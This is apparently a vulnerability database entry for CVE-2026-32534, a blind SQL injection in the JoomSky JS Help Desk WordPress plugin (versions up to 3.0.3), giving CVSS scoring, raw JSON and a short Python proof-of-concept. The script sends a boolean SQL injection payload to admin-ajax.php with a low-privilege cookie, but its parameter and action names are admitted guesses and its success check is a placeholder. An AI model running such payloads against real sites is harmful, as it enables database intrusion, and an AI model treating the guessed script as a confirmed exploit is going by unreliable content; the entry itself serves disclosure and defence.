Security Vulnerability Report
中文
CVE-2026-32534 CVSS 8.5 HIGH

CVE-2026-32534

Published: 2026-03-25 17:17:07
Last Modified: 2026-04-24 16:35:20

Description

Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in JoomSky JS Help Desk js-support-ticket allows Blind SQL Injection.This issue affects JS Help Desk: from n/a through <= 3.0.3.

CVSS Details

CVSS Score
8.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:L

Configurations (Affected Products)

No configuration data available.

JoomSky JS Help Desk <= 3.0.3

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests # PoC for CVE-2026-32534 - Blind SQL Injection in JoomSky JS Help Desk # Target: JoomSky JS Help Desk <= 3.0.3 url = "http://target-site.com/wp-admin/admin-ajax.php" # Attacker needs a valid low-privilege session cookie cookies = { "wordpress_logged_in_...": "low_priv_user_session_cookie" } # Vulnerable parameter might be 'ticket_id' or similar based on plugin structure payload = { "action": "js_support_ticket_action", "ticket_id": "1 AND (SELECT SUBSTRING(@@version, 1, 1)) = '5' -- " } try: response = requests.post(url, data=payload, cookies=cookies, timeout=10) if "expected_content" in response.text: print("[+] Vulnerability confirmed: Database response indicates successful injection.") else: print("[-] Injection failed or patched.") except Exception as e: print(f"[!] Error: {e}")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-32534", "sourceIdentifier": "[email protected]", "published": "2026-03-25T17:17:07.010", "lastModified": "2026-04-24T16:35:20.070", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in JoomSky JS Help Desk js-support-ticket allows Blind SQL Injection.This issue affects JS Help Desk: from n/a through <= 3.0.3."}, {"lang": "es", "value": "Vulnerabilidad de Neutralización Incorrecta de Elementos Especiales utilizados en un Comando SQL ('Inyección SQL') en JoomSky JS Help Desk js-support-ticket permite Inyección SQL Ciega. Este problema afecta a JS Help Desk: desde n/a hasta &lt;= 3.0.3."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:L", "baseScore": 8.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.1, "impactScore": 4.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-89"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/js-support-ticket/vulnerability/wordpress-js-help-desk-plugin-3-0-3-sql-injection-vulnerability?_s_id=cve", "source": "[email protected]"}]}}